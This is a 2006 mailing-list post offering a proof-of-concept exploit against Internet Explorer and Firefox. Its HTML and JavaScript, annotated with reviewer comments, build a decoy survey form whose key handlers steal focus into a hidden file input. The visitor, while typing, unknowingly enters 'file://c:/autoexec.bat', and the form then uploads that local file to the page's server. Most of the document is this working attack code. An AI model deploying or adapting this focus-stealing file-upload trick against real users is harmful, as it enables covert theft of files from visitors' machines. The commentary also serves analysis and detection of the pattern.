


Vulnerability Development: InternetExplorer & Mozilla Firefox Local File Disclosure Vulnerability PoC Exploit (Reported by Symantec)

InternetExplorer & Mozilla Firefox Local File Disclosure Vulnerability PoC Exploit (Reported by Symantec)

From: <sirdarckcat_at_gmail.com>
Date: 11 Jun 2006 09:37:33 -0000
This is a sample PoC exploit for the Internet Explorer and Mozilla Firefox security flaw explained here:
http://www.techweb.com/showArticle.jhtml?articleID=188702202
and reported by Symantec.

The subjects suggested for the links are meant to force the user to type:
FILE
AUTOEXEC
BAT

so we can receive:
file://c:/autoexec.bat

and upload this file to a server.

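This is a low-risk vulnerability: it depends on the user typing the required characters in order, and only a file whose path is known in advance can be targeted.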

//--START HTML CODE--//
<html>
<body>
<!-- Decoy form: the visible part is a list of subjects and a free-text area
     (name=other) where the visitor is asked to type URLs. -->
<form method=post action="upload.php" type="multipart/form-data">
Please sugest 3 webpages for each subject (please include http:// or https://)
<ul>
<li>Freeware Files Download</li>
<li>Automovilism</li>
<li>Extreme Sports</li>
<li>Technology</li>
<li>Batman</li>
</ul>
<textarea name=other style="width:100%;height:50%"></textarea><br>
<!-- File control (name=thet) that starts disabled, hidden and sized 1x1, so the
     visitor does not see it. The script below enables and focuses it. For
     reviewers: a file input that is hidden or shrunk and then driven from key
     handlers is the recognisable trait of this pattern. -->
<input type=file name=thet disabled style="visibility:hidden;height:1;width:1">
</form>
<script>
/**
* OnKeyDown - JavaScript - Local File Disclosure vuln. PoC
* by sirdarckcat [at] gmail [.] com
* from: elhacker.net
**/
// Three parallel 22-entry sequences, indexed by the progress counter `dv`.
// nidshift[i]: 1 when position i is only accepted with Shift held, 0 when it
// is only accepted with Shift released (see the check in checa).
var nidshift = new Array(0 ,0 ,0 ,0 ,1 ,0 ,0 ,0 ,1 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0);
// thefilek[i]: the keyCode expected at position i. These are key codes, not
// characters, so the mapping to ':' , '/' and '.' is keyboard-layout dependent
// (presumably 190 = period key and 111 = numpad divide -- confirm).
var thefilek = new Array(70,73,76,69,190,111,111,67,190,111,65,85,84,79,69,88,69,67,190,66,65,84);
// The hard-coded 22-character path the sequence spells out; its characters are
// echoed into the textarea one at a time as positions are matched.
var thefilew = "file://c:/autoexec.bat";
// Index of the next position still to be matched.
var dv = 0;
// Tracked Shift-key state, updated by the three key handlers.
var chift = false;
// teo: the hidden file input (name=thet); feo: the visible textarea (name=other).
var teo = document.forms[0].thet;
var feo = document.forms[0].other;

/**
 * keydown handler: advances through the expected key sequence and, on each
 * matching key, enables, shows and focuses the hidden file input.
 *
 * NOTE(review): this code only moves focus during keydown; the disclosure
 * presumably relies on the browser then delivering the typed character to the
 * newly focused file control -- confirm against the advisory. A browser whose
 * file inputs do not accept typed text (path set only through the picker
 * dialog) would not be exposed to this pattern.
 *
 * @param tecla  The key event; when it has no `which`, the global `event`
 *               object's keyCode is read instead.
 */
function checa(tecla) {
                var rt=(tecla.which)?tecla.which:event.keyCode;
                // lw is computed but never used in this function.
                var lw=String.fromCharCode(rt);
                // Once every position has been matched, the next keydown submits the form.
                if (dv>=thefilew.length){
                        document.forms[0].submit();
                }
                // keyCode 16 is Shift: remember that it is held.
                if (rt == 16){
                        chift = true;
                }
                if (rt==thefilek[dv]){
                        // Key matches; accept it only if the Shift state matches the one
                        // required for this position. A matching key with the wrong
                        // Shift state falls through and changes nothing.
                        if ((nidshift[dv] && chift) || (!nidshift[dv] && !chift)){
                                // Make the file input usable and move focus to it.
                                teo.disabled=false;
                                teo.style.visibility="visible";
                                teo.focus();
                                // Echo the expected character into the textarea, so the
                                // visible field keeps showing what was typed.
                                feo.value += thefilew[dv];
                                dv++;
                        }
                }else{
                        // Any other key: return focus to the textarea and hide/disable
                        // the file input again. dv is not reset.
                        feo.focus();
                        teo.disabled=true;
                        teo.style.visibility="hidden";
                }
}
/**
 * keyup handler: clears the tracked Shift state when the released key has
 * keyCode 16 (Shift).
 *
 * @param tecla  The key event; when it has no `which`, the global `event`
 *               object's keyCode is read instead.
 */
function solsh(tecla){
        var rt=(tecla.which)?tecla.which:event.keyCode;
        if (rt == 16){
                chift = false;
        }
}
/**
 * keypress handler: sets the tracked Shift state when the reported code is 16.
 * This duplicates the Shift check that checa already performs on keydown.
 *
 * @param tecla  The key event; when it has no `which`, the global `event`
 *               object's keyCode is read instead.
 */
function mprss(tecla){
        var rt=(tecla.which)?tecla.which:event.keyCode;
        if (rt == 16){
                chift = true;
        }
}
// Handlers are attached to the whole document, so every key event on the page
// passes through them regardless of which element has focus.
document.onkeydown = checa;
document.onkeyup = solsh;
document.onkeypress= mprss;
</script>
</body>
</html>
//--END HTML CODE--//

Att.
Sirdarckcat
www.elhacker.net
Received on Jun 12 2006
